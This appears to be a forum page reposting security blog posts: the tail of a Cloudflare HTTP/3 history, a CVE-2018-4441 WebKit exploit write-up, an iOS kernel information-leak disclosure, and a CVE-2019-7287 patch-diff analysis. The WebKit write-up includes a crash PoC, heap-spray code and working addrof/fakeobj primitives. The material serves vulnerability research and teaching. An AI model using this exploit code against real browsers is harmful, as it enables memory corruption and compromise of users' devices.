becomes more evident that HTTP/2 and HTTP/3 are syntax definitions for the common HTTP semantics. This doesn't mean they don't have their own features beyond syntax but it should help frame discussion going forward. Pulling it all together This blog post has taken a shallow look at the standardisation process for HTTP in the IETF across the last three decades. Without touching on many technical details, I've tried to explain how we have ended up with HTTP/3 today. If you skipped the good bits in the middle and are looking for a one liner here it is: HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. There are many interesting technical areas to explore further but that will have to wait for another day. In the course of this post, we explored important chapters in the development of HTTP and TLS but did so in isolation. We close out the blog by pulling them all together into the complete Secure Web Timeline presented below. You can use this to investigate the detailed history at your own comfort. And for the super sleuths, be sure to check out the full version including draft numbers. Tagged with IETF, QUIC, TLS, Security Sursa: https://blog.cloudflare.com/http-3-from-root-to-tip/
  14. CVE-2018-4441: OOB R/W via JSArray::unshiftCountWithArrayStorage (WebKit) Feb 15, 2019 In this write-up, we’ll be going through the ins and outs of CVE-2018-4441, which was reported by lokihardt of Google Project Zero. Overview bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { unsigned oldLength = storage->length(); RELEASE_ASSERT(count <= oldLength); // If the array contains holes or is otherwise in an abnormal state, // use the generic algorithm in ArrayPrototype. if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) || hasSparseMap() || shouldUseSlowPut(indexingType())) { return false; } if (!oldLength) return true; unsigned length = oldLength - count; storage->m_numValuesInVector -= count; storage->setLength(length); // [...] Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code “storage->m_numValuesInVector -= count”. But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So “storage->m_numValuesInVector” can be controlled by the user. In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method. PoC function main() { // [1] let arr = [1]; // [2] arr.length = 0x100000; // [3] arr.splice(0, 0x11); // [4] arr.length = 0xfffffff0; // [5] arr.splice(0xfffffff0, 0, 1); } main(); Root Cause Analysis Running the PoC inside a debugger we see that the binary crashes while trying to write in non-writable memory (EXC_BAD_ACCESS😞 (lldb) r Process 3018 launched: './jsc' (x86_64) Process 3018 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638) frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage: -> 0x100af8cd3 <+675>: movq $0x0, 0x10(%r13,%rdi,8) 0x100af8cdc <+684>: incq %rcx 0x100af8cdf <+687>: incq %rdx 0x100af8ce2 <+690>: jne 0x100af8cd0 ; <+672> Target 0: (jsc) stopped. (lldb) p/x $r13 (unsigned long) $4 = 0x00000010000fe6a8 (lldb) p/x $rdi (unsigned long) $5 = 0x00000000fffffff0 (lldb) memory region $r13+($rdi*8) [0x00000017fa800000-0x0000001802800000) --- (lldb) bt * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638) * frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675 frame #1: 0x0000000100af8fc7 JavaScriptCore`JSC::JSArray::unshiftCountWithAnyIndexingType(JSC::ExecState*, unsigned int, unsigned int) + 215 frame #2: 0x0000000100a6a1d5 JavaScriptCore`void JSC::unshift<(JSC::JSArray::ShiftCountMode)1>(JSC::ExecState*, JSC::JSObject*, unsigned int, unsigned int, unsigned int, unsigned int) + 181 frame #3: 0x0000000100a61c4b JavaScriptCore`JSC::arrayProtoFuncSplice(JSC::ExecState*) + 4267 [...] To be more precise, the crash occurs in the following loop in JSArray::unshiftCountWithArrayStorage where it tries to clear (zero-initialize) the added vector’s elements: // [...] for (unsigned i = 0; i < count; i++) vector[i + startIndex].clear(); // [...] startIndex ($rdi) is 0xfffffff0, vector ($r13) points to 0x10000fe6a8 and the resulting offset leads to a non-writable address, hence the crash. PoC Analysis // [1] let arr = [1] // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6b0 // - Type: ArrayWithInt32 // - public length: 1 // - vector length: 1 Initially, create an array of type ArrayWithInt32. It can hold any kind of elements (such as objects or doubles) but it still doesn’t have an associated ArrayStorage or holes. The WebKit project gives a nice overview of the different array storage methods. In short, a JSArray without an ArrayStorage will have a butterfly structure of the following form: --==[[ JSArray (lldb) x/2gx -l1 0x107bb4340 0x107bb4340: 0x0108211500000062 <--- JSC::JSCell [*] 0x107bb4348: 0x00000010000fe6b0 <--- JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly +0 { 16} JSArray +0 { 16} JSC::JSNonFinalObject +0 { 16} JSC::JSObject [*] 01 08 21 15 00000062 +0 { 8} JSC::JSCell | | | | | +0 { 1} JSC::HeapCell | | | | +-------- +0 < 4> JSC::StructureID m_structureID; | | | +----------- +4 < 1> JSC::IndexingType m_indexingTypeAndMisc; | | +-------------- +5 < 1> JSC::JSType m_type; | +----------------- +6 < 1> JSC::TypeInfo::InlineTypeFlags m_flags; +-------------------- +7 < 1> JSC::CellState m_cellState; +8 < 8> JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly; +8 < 8> JSC::Butterfly * m_value; --==[[ Butterfly (lldb) x/2gx -l1 0x00000010000fe6b0-8 0x10000fe6a8: 0x0000000100000001 <--- JSC::IndexingHeader [*] 0x10000fe6b0: 0xffff000000000001 <--- arr[0] 0x10000fe6b8: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) [*] 00000001 00000001 | | | +-------- uint32_t JSC::IndexingHeader.u.lengths.publicLength +----------------- uint32_t JSC::IndexingHeader.u.lengths.vectorLength // [2] arr.length = 0x100000 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0x100000 // - vector length: 1 // - m_numValuesInVector: 1 Next, set its length to 0x100000 and transision the array to an ArrayWithArrayStorage. Actually, setting the length of an array to anything greater than or equal to MIN_SPARSE_ARRAY_INDEX would transform it to ArrayWithArrayStorage. Additionally, just notice how the butterfly of an array with ArrayStorage points to the ArrayStorage instead of the first index of the array. --==[[ Butterfly (lldb) x/5gx -l1 0x00000010000fe6e8-8 0x10000fe6e0: 0x0000000100100000 <--- JSC::IndexingHeader 0x10000fe6e8: 0x0000000000000000 \___ JSC::ArrayStorage [*] 0x10000fe6f0: 0x0000000100000000 / 0x10000fe6f8: 0xffff000000000001 <--- m_vector[0], arr[0] 0x10000fe700: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) +0 { 24} ArrayStorage [*] 0000000000000000 --- +0 < 8> JSC::WriteBarrier<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > m_sparseMap; 0000000100000000 +0 { 8} JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > | | +0 < 8> JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> >::StorageType m_cell; | +----------- +8 < 4> unsigned int m_indexBias; +------------------- +12 < 4> unsigned int m_numValuesInVector; +16 < 8> JSC::WriteBarrier<JSC::Unknown, WTF::DumbValueTraits<JSC::Unknown> > [1] m_vector; // [3] arr.splice(0, 0x11) // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffef // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 JavaScriptCore implements splice using shift and unshift operations and decides between the two based on itemCount and actualDeleteCount. EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec) { // [...] unsigned actualStart = argumentClampedIndexFromStartOrEnd(exec, 0, length); // [...] unsigned actualDeleteCount = length - actualStart; if (exec->argumentCount() > 1) { double deleteCount = exec->uncheckedArgument(1).toInteger(exec); RETURN_IF_EXCEPTION(scope, encodedJSValue()); if (deleteCount < 0) actualDeleteCount = 0; else if (deleteCount > length - actualStart) actualDeleteCount = length - actualStart; else actualDeleteCount = static_cast<unsigned>(deleteCount); } // [...] unsigned itemCount = std::max<int>(exec->argumentCount() - 2, 0); if (itemCount < actualDeleteCount) { shift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } else if (itemCount > actualDeleteCount) { unshift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } // [...] } Thus, calling splice with itemCount < actualDeleteCount will eventually invoke JSArray::shiftCountWithArrayStorage. bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] // If the array contains holes or is otherwise in an abnormal state, // use the generic algorithm in ArrayPrototype. if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) || hasSparseMap() || shouldUseSlowPut(indexingType())) { return false; } // [...] storage->m_numValuesInVector -= count; // [...] } As it is also mentioned in the original bug report, assumming the array has neither indexed accessors nor any Proxy objects in the prototype chain, holesMustForwardToPrototype will return false and storage->m_numValuesInVector -= count will be called. In our case, count is equal to 0x11 and prior to the subtraction m_numValuesInVector is equal to 1, resulting in 0xfffffff0 as the final value. // [4] arr.length = 0xfffffff0 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffffff0 // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 At this point the value of m_numValuesInVector is under control. By setting the publicLength of the array to the value of m_numValuesInVector, hasHoles can be controlled as well. bool hasHoles() const { return m_numValuesInVector != length(); } It is worth mentioning that our control over m_numValuesInVector is very limited and is tightly related to the OOB read/write that will be discussed in more detail later. // [5] arr.splice(0xfffffff0, 0, 1) Finally splice is called with itemCount > actualDeleteCount in order to trigger unshift instead of shift. hasHoles returns false and we get OOB r/w in JSArray::unshiftCountWithArrayStorage. Exploitation Our plan is to leverage memmove in JSArray::unshiftCountWithArrayStorage into achieving addrof and fakeobj primitives. But before we do that, we have to set out an overall plan. There are three if-cases before the memmove call. bool JSArray::unshiftCountWithArrayStorage(ExecState* exec, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] bool moveFront = !startIndex || startIndex < length / 2; // [1] if (moveFront && storage->m_indexBias >= count) { Butterfly* newButterfly = storage->butterfly()->unshift(structure(vm), count); storage = newButterfly->arrayStorage(); storage->m_indexBias -= count; storage->setVectorLength(vectorLength + count); setButterfly(vm, newButterfly); // [2] } else if (!moveFront && vectorLength - length >= count) storage = storage->butterfly()->arrayStorage(); // [3] else if (unshiftCountSlowCase(locker, vm, deferGC, moveFront, count)) storage = arrayStorage(); else { throwOutOfMemoryError(exec, scope); return true; } WriteBarrier<Unknown>* vector = storage->m_vector; if (startIndex) { if (moveFront) // [4] memmove(vector, vector + count, startIndex * sizeof(JSValue)); else if (length - startIndex) // [5] memmove(vector + startIndex + count, vector + startIndex, (length - startIndex) * sizeof(JSValue)); } // [...] } Initially, we discarded case [1] and [3] since they’ll reallocate the current butterfly, leading to what we (wrongfully) assumed an unreliable memmove due to the fact that we can’t predict (turns out we can) where will the newly allocated butterfly land. With that in mind, we moved on with [2], but quickly stumbled upon a dead-end. If we were to take that route, we’d have to make moveFront false. To do that, startIndex has to be non-zero and greater than or equal to length/2. This ends up being a bummer because [4] will copy at least length/2 * 8 bytes. That’s a pretty gigantic number if you recall how we got to that code path in the first place. To cut to the chase, right after the memmove call we got a crash. We didn’t investigate the root cause any further, but since we memmove a big amount of memory, we believe some objects/structures adjacent to the butterfly are corrupted. Maybe by spraying a bunch of 0x100000 size JSArrays you could get around that, maybe not. We thought it was too dirty and abandoned the idea. Spray to slay At that point, we decided to browse through older exploits. niklasb came to the rescue with his exploit. In short, his code makes holes of certain size objects in the heap and reliably allocates them back. That felt ideal for [1] and [3]. Here’s how we adapted that approach to meet our exploitation criteria: let SPRAY_SIZE = 0x3000; // [a] let spray = new Array(SPRAY_SIZE); // [b] for (let i = 0; i < 0x3000; i += 3) { // ArrayWithDouble, will allocate 0x60, will be free'd spray[i] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; // ArrayWithContiguous, will allocate 0x60, will be corrupted for fakeobj spray[i+1] = [{},{},{},{},{},{},{},{},{},{}]; // ArrayWithDouble, will allocate 0x60, will be corrupted for addrof spray[i+2] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; } // [c] for (let i = 0; i < 1000; i += 3) spray[i] = null; // [d] gc(); // [e] for (let i = 0; i < SPRAY_SIZE; i += 3) // corrupt butterfly's length field spray[i+1][0] = i2f(1337) What we’re practically doing is [a] create an array, root a bunch of arrays of certain size in it, [c] remove their references to them and finally [d] trigger gc, resulting to heap holes of that size. We use this logic in our exploit in order to get a reallocated butterfly literally next to a victim/sprayed object of ours that we wish to corrupt. In case you didn’t notice, each spray index is a JSArray of size 10. Why 10? After a couple of test runs, while debugging all the way to the butterfly allocation in Butterfly::tryCreateUninitialized, we ended up with arr.splice(1000, 1, 1, 1). We noticed that the reallocated size will be 0x58 (rounded up to 0x60). This is the exact size of a JSArray whose butterfly holds 10 elements. Let’s visualize how does that spray look like in memory. ... +0x0000: 0x0000000d0000000a ----------+ +0x0000: 0x402abd70a3d70a3d | +0x0008: 0x402abd70a3d70a3d | +0x0010: 0x402abd70a3d70a3d | +0x0018: 0x402abd70a3d70a3d | +0x0020: 0x402abd70a3d70a3d spray[i], ArrayWithDouble +0x0028: 0x402abd70a3d70a3d | +0x0030: 0x402abd70a3d70a3d | +0x0038: 0x402abd70a3d70a3d | +0x0040: 0x402abd70a3d70a3d | +0x0048: 0x402abd70a3d70a3d ----------+ ... +0x0068: 0x0000000d0000000a ----------+ +0x0070: 0x00007fffaf7c83c0 | +0x0078: 0x00007fffaf7b0080 | +0x0080: 0x00007fffaf7b00c0 | +0x0088: 0x00007fffaf7b0100 | +0x0090: 0x00007fffaf7b0140 spray[i+1], ArrayWithContiguous +0x0098: 0x00007fffaf7b0180 | +0x00a0: 0x00007fffaf7b01c0 | +0x00a8: 0x00007fffaf7b0200 | +0x00b0: 0x00007fffaf7b0240 | +0x00b8: 0x00007fffaf7b0280 ----------+ ... +0x00d8: 0x0000000d0000000a ----------+ +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x402abd70a3d70a3d | +0x00f0: 0x402abd70a3d70a3d | +0x00f8: 0x402abd70a3d70a3d | +0x0100: 0x402abd70a3d70a3d spray[i+2], ArrayWithDouble +0x0108: 0x402abd70a3d70a3d | +0x0110: 0x402abd70a3d70a3d | +0x0118: 0x402abd70a3d70a3d | +0x0120: 0x402abd70a3d70a3d | +0x0128: 0x402abd70a3d70a3d ----------+ ... The goal of [c] and [d] is to land a reallocated butterfly at spray. Note we have control of both startIndex and count. startIndex represents the index where we want to start adding/deleting elements and count represents the actual number of added elements. For instance, arr.splice(1000, 1, 1, 1) gives a startIndex of 1000 and a count of 1 (if you think about it, we delete 1 element and add [1,1], essentially adding one element). Indeed, it’d be quite convenient if we landed that idea. In particular, with those numbers at hand, the memmove call at [4] translates to this: // [...] WriteBarrier<Unknown>* vector = storage->m_vector; if (1000) { if (1) memmove(vector, vector + 1, 1000 * sizeof(JSValue)); } // [...] Essentially, we’ll be moving memory “backwards”. For example, assuming Butterfly::tryCreateUninitialized returns spray[6], then you can think of [4] as: for (j = 0; j < startIndex; i++) spray[6][j] = spray[6][j+1]; This is how we’ll overwrite the length header field of the adjacent array’s butterfly, leading to an OOB and finally to a sweet addrof/fakeobj primitive. This is how the memory looks like right before [4]: ... +0x0000: 0x00000000badbeef0 <--- vector +0x0008: 0x0000000000000000 +0x0010: 0x00000000badbeef0 +0x0018: 0x00000000badbeef0 +0x0020: 0x00000000badbeef0 |vectlen| |publen| +0x0028: 0x0000000d0000000a ---------+ +0x0030: 0x0001000000000539 | +0x0038: 0x00007fffaf734dc0 | +0x0040: 0x00007fffaf734e00 | +0x0048: 0x00007fffaf734e40 | +0x0050: 0x00007fffaf734e80 spray[688] +0x0058: 0x00007fffaf734ec0 | +0x0060: 0x00007fffaf734f00 | +0x0068: 0x00007fffaf734f40 | +0x0070: 0x00007fffaf734f80 | +0x0078: 0x00007fffaf734fc0 ---------+ ... +0x0098: 0x0000000d0000000a ---------+ +0x00a0: 0x402abd70a3d70a3d | +0x00a8: 0x402abd70a3d70a3d | +0x00b0: 0x402abd70a3d70a3d | +0x00b8: 0x402abd70a3d70a3d | +0x00c0: 0x402abd70a3d70a3d spray[689] +0x00c8: 0x402abd70a3d70a3d | +0x00d0: 0x402abd70a3d70a3d | +0x00d8: 0x402abd70a3d70a3d | +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x4085e2f5c28f5c29 ---------+ ... And here’s the aftermath. Pay close attention to spray[688]’s vectorLength and publicLength fields: ... +0x0020: 0x0000000d0000000a |vectlen| |publen| +0x0028: 0x0001000000000539 --------+ +0x0030: 0x00007fffaf734dc0 | +0x0038: 0x00007fffaf734e00 | +0x0040: 0x00007fffaf734e40 | +0x0048: 0x00007fffaf734e80 | +0x0050: 0x00007fffaf734ec0 spray[688] +0x0058: 0x00007fffaf734f00 | +0x0060: 0x00007fffaf734f40 | +0x0068: 0x00007fffaf734f80 | +0x0070: 0x00007fffaf734fc0 | +0x0078: 0x0000000000000000 --------+ ... We’ve successfully overwritten spray[688]’s length. It’s pretty much game over. addrof and fakeobj let oob_boxed = spray[688]; // ArrayWithContiguous let oob_unboxed = spray[689]; // ArrayWithDouble let stage1 = { addrof: function(obj) { oob_boxed[14] = obj; return f2i(oob_unboxed[0]); }, fakeobj: function(addr) { oob_unboxed[0] = i2f(addr); return oob_boxed[14]; }, test: function() { var addr = this.addrof({a: 0x1337}); var x = this.fakeobj(addr); if (x.a != 0x1337) { fail(1); } print('[+] Got addrof and fakeobj primitives \\o/'); } } We’ll use oob_boxed, whose length we overwrote, to write an object’s address inside oob_unboxed, in order to construct our addrof primitive and lastly use oob_unboxed to place arbitrary addresses in it and be able to interpret them as objects via oob_boxed. The rest of the exploit is plug n’ play code used in almost every exploit; Spraying structures and using named properties for arbitrary read/write. w00dl3cs has done a great job explaining that part here so we’ll leave it at that. Conclusion CVE-2018-4441 was fixed in commit 51a62eb53815863a1bd2dd946d12f383e8695db0. We’ll release our exploit shortly after we clean it up a bit. If you have any questions/suggestions, feel free to contact us on twitter. References Attacking JavaScript Engines instanceof exploit write-up by w00dl3cs array overflow exploit by niklasb Sursa: https://melligra.fun/webkit/2019/02/15/cve-2018-4441/
  15. iOS kernel.backtrace Information Leak Vulnerability Posted: 2019-02-22 09:00 by Stefan Esser | More posts about Blog iOS Kernel Informationleak Vulnerability Intro In our iOS Kernel Internals for Security Researchers training at offensive_con we let our trainees look at some code that Apple introduced to the kernel in iOS 10. This code implements a new sysctl handler for the kernel.backtrace sysctl. This sysctl is meant to retrieve the current thread's user level backtrace. The idea behind this exercise is to see if the trainees can spot a 0-day information leak vulnerability in the iOS kernel if they are already pointed into the right direction. kernel.backtrace The kernel.backtrace is a relatively new addition to the iOS kernel that let's the current process retrieve its own user level backtrace. While the logic of determining the user level's backtrace is somewhere buried in the Mach part of the kernel source code the sysctl handler itself is implemented in the file /bsd/kern/kern_backtrace.c. The code for the handler is shown below. 48 static int 49 backtrace_sysctl SYSCTL_HANDLER_ARGS 50 { 51 #pragma unused(oidp, arg2) 52 uintptr_t *bt; 53 uint32_t bt_len, bt_filled; 54 uintptr_t type = (uintptr_t)arg1; 55 bool user_64; 56 int err = 0; 57 58 if (type != BACKTRACE_USER) { 59 return EINVAL; 60 } 61 62 if (req->oldptr == USER_ADDR_NULL || req->oldlen == 0) { 63 return EFAULT; 64 } 65 66 bt_len = req->oldlen > MAX_BACKTRACE ? MAX_BACKTRACE : req->oldlen; 67 bt = kalloc(sizeof(uintptr_t) * bt_len); 68 if (!bt) { 69 return ENOBUFS; 70 } 71 72 err = backtrace_user(bt, bt_len, &bt_filled, &user_64); 73 if (err) { 74 goto out; 75 } 76 77 err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t)); 78 if (err) { 79 goto out; 80 } 81 req->oldidx = bt_filled; 82 83 out: 84 kfree(bt, sizeof(uintptr_t) * bt_len); 85 return err; 86 } The code above will first validated the incoming arguments and limit the depth of the backtrace that can be retrieved (lines 58-66). It will then allocated a heap buffer to store a backtrace of the user selected depth in line 67 and use an external helper function to fill the buffer with the user level backtrace (line 72). The actually retrieved backtrace is then copied to user land (line 77) and the heap buffer is released (line 84). The Vulnerability Before reading on further I suggest that you take a look at the code above again and try to spot the vulnerability yourself without help. Only one hint should be given: the vulnerability can only be exploited in older iOS/watchOS/tvOS devices. Please do not read further before you have given yourself a chance to spot the vulnerability. I am serious! Please try to first spot the vulnerability yourself. The fact that you are reading this means you either ignored the three warnings above or you have already looked at the code yourself and either spotted the vulnerability or you have given up after a reasonable amount of time looking at the code. So let us figure out the problem together. Let us have a look at the line that copies the backtrace to user land. 77 err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t)); 78 if (err) { 79 goto out; 80 } As you can see the amount of bytes copied to user land is bt_filled * sizeof(uint64_t). This is the number of filled out backtrace entries times 8 bytes. And now let us have a look at how big the heap buffer is that we are dealing with. 67 bt = kalloc(sizeof(uintptr_t) * bt_len); 68 if (!bt) { 69 return ENOBUFS; 70 } We kann see here that the size of the heap buffer is determined by the formula sizeof(uintptr_t) \* bt_len. This is the number of maximally retrieved backtrace entries times the size of a pointer. And this is were our previous hint kicks in: The size of a pointer is only 8 on recent devices. Older iOS devices (iPhone 5c and below) and older Apple Watches (Series 3) are internally 32 bit devices and therefore have only 4 byte pointers. This means on these older devices the call to copyout() will allow to copy twice the size of bytes from the heap than the buffer size is. This is a classic heap buffer overread vulneability. The Impact As pointed out this is a 0-day kernel information leak vulnerability that has not been shared with Apple before now and therefore it is still unfixed in the kernel. However there are a number of mitigating factors: the vulnerability affects only 32 bit iOS devices - the only devices Apple still supports in current releases that are 32 bit are Apple Watch Series 3 and below the vulnerability can only be triggered outside of the app sandbox - so it can only be used as part as a vulnerability chain and not exploited directly from an app iOS 12 copyin/copyout Mitigation Starting with iOS 12 Apple has added a mitigation to the kernel that checks whenever copyin() or copyout() are executed if the kernel's heap buffer has the necessary size for the operation to continue. The kernel will panic if an attacker tries to read or write accross the boundary of a kernel zone heap element. However this mitigation does not stop an attacker from exploiting this vulnerability because Apple did not add this protection to 32 bit kernels. It is unknown if they simply forgot to protect their remaining 32 bit devices or if they simply do not care about them at all anymore. The Apple Security Bounty The value of this security vulnerability in the eyes of Apple's security bounty program is exactly 0 USD. There are three reasons for this: Apple only pays for vulnerabilities affecting the latest of their devices. It doesn't matter if they officially still support older devices by providing them updates. They will only pay if the bugs affect the recent devices. Apple does not pay for vulnerabilities that affect MacOS / tvOS / WatchOS. Only if iOS devices are affected they might pay. Apple does not pay for information leak vulnerabilities although many of their mitigations rely on kernel memory being kept confidential. Conclusion This vulnerability is one of those things that are hard to explain. It is in relatively new code, so we would assume that kernel developers these days should be careful when writing new code. So it is rather a mystery why for the allocation and for copying the data two different data types are used. It is furthermore hard to explain why a security review of the new kernel code that should happen everytime new code is added did not spot this. The use of two different data types for allocation and copying is pretty obvious and trainees at offensive_con that were just learning about the kernel were pretty fast in seeing the problem. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-22-ios-kernel-backtrace-information-leak-vulnerability.html
  16. Is CVE-2019-7287 hidden in ProvInfoIOKitUserClient? Posted: 2019-02-24 00:00 by Stefan Esser | More posts about Blog iOS Kernel CVE-2019-7287 ProvInfoIOKitUserClient ProvInfoIOKit Vulnerability Intro On February 8th 2019 Apple released the iOS 12.1.4 update that fixed a previously disclosed security vulnerability in Facetime group conferences that was heavily discussed in media the week before. However with the same update Apple fixed a number of other vulnerabilities as documented in the usual place. While it is not uncommon for Apple to fix multiple security problems with the same update a tweet from Google's project zero made the public aware that two of these vulnerabilitis were apparently found being exploited in the wild. Since then more than two weeks have passed and neither Google nor Apple have given out any details about this incident, which leaves the rest of the world in the dark about what exactly happened, how Google was able to catch a chain of iOS 0-day vulnerabilities in the wild and where exactly the vulnerabilities are located. As usual Apple security notes contain only very brief descriptions of what was fixed. So it is no surprise that all they disclose about these vulnerabilities is the following. Foundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7287: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero This information is very unsatisfying and therefore we decided to have a look into what was actually fixed. Because we usually concentrate on the iOS kernel we tried to figure out what vulnerability is hiding behind CVE-2019-7287 by binary diffing the iOS 12.1.3 and the iOS 12.1.4 kernels. Patch Analysis Analysing iOS security patches has become a lot easier since the last time an iOS malware has been caught in the wild. With the release of iOS 10 Apple started to ship the iOS kernel in the firmware in decrypted form to be more open. But then they recently decided with iOS 12 to back paddle on this openness by stripping all symbols from the shipped kernels. However due to a mistake they shipped a fully symbolized iOS 12 kernel during the development stages that was immediately uploaded to Hexray's Lumina service. Without symbols analysing patches becomes a bit more difficult however in this case the functions in question even have strings in them that point to the problem directly. Once you have extracted the two kernels from the firmware they can analysed for differences. We have used the open source binary diffing plugin Diaphora for IDA to perform this task. For our comparison we loaded the iOS 12.1.3 kernel into IDA, then waited for the autoanalysis to finish and then used Diaphora to dump the current IDA database into the SQLITE database format Diaphora uses. We repeated this process with the iOS 12.1.4 kernel and then told Diaphora to diff the two databases using its slow heuristics overnight. The result of this comparison showed only a very small amount of partially changed functions. When looking at these functions we believe the vulnerability is likely in the function ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment. The reason why we believe this is because Apple introduced a new size check in this function. Have a look at the previous version of the function. And now have a look at the fixed version in iOS 12.1.4. You can clearly see the newly introduced size check in the area marked as red with a clear error message attached to it. ProvInfoIOKitUserClient The IOKit objects ProvInfoIOKit and ProvInfoIOKitUserClient are implemented in a driver called com.apple.driver.ProvInfoIOKit. Connections to driver cannot be created from the normal container sandbox that iOS applications run in. This means there is likely a sandbox escape involved in the full iOS exploitation chain that Google found. Alternatively the exploit chain could exploit one of the daemons that have legitimate access to this driver. A check of the sandbox profiles as shipped with iOS 12 reveals that there are three daemon sandboxes that are allowed to access this driver. These daemon sandboxes are: findmydeviced mobileactivationd identityserviced Which route to this driver was taken by the original attackers we can only guess until Apple or Google finally decide to reveal this information to the public. All this assuming that our guess is right and the newly introduced size check is actually the fix for CVE-2019-7287. Having pinpointed the newly introduced size check in ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment the next step is to find out how this function can actually be called from the outside. As it turns out this function is directly exposed to userland via the externalMethod interface of the driver. A check of ProvInfoIOKitUserClient::getTargetAndMethodForIndex reveals that the driver offers 6 different external methods to userland. These methods are: ucGenerateSeed (obfuscated name: fpXqy2dxjQo7) ucGenerateInFieldSeed (obfuscated name: afpHseTGo8s) ucExchangeWithHoover (obfuscated name: AEWpRs) ucGetEntcryptedSeedSegment ucEncryptSUInfo ucEncryptWithWrapperKey The interesting thing here is that three first external methods have obfuscated names in the leaked symbols. However all six routines have very explicit strings in them that reveal their name. Checking into the other external methods we were in for a surprise. The Surprise When looking into ucEncryptSUInfo and ucEncryptWithWrapperKey we were surprised to see that both these functions have also been changed. Both have also gotten new size checks. And both these functions did not show up in our Diaphora output. At some point we may want to go back and try to figure out why Diaphora did not see these functions as changed (or maybe they changed too much so that the different functions were not matched). When you look at these functions and the introduced size checks you will also see that directly after the size check there are calls do memmove. When you look at the calls to memmove it seems that before the size checks were introduced the code fully trusted user supplied size fields in the incoming parameter structure. This likely lead to arbitrary sized heap memory corruptions. We will take a look into this in the next days to verify this educated guess. To be continued Our research and therefore this blog post is far from finished. We only wanted to get this information out as soon as possible in order to first verify that we have pinpointed the right location before we invest further resources into maybe chasing down the wrong bug. Please check back in a few days to see if we have updated this post. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-23-ios-kernel-cve-2019-7287-memory-corruption-vulnerability.html
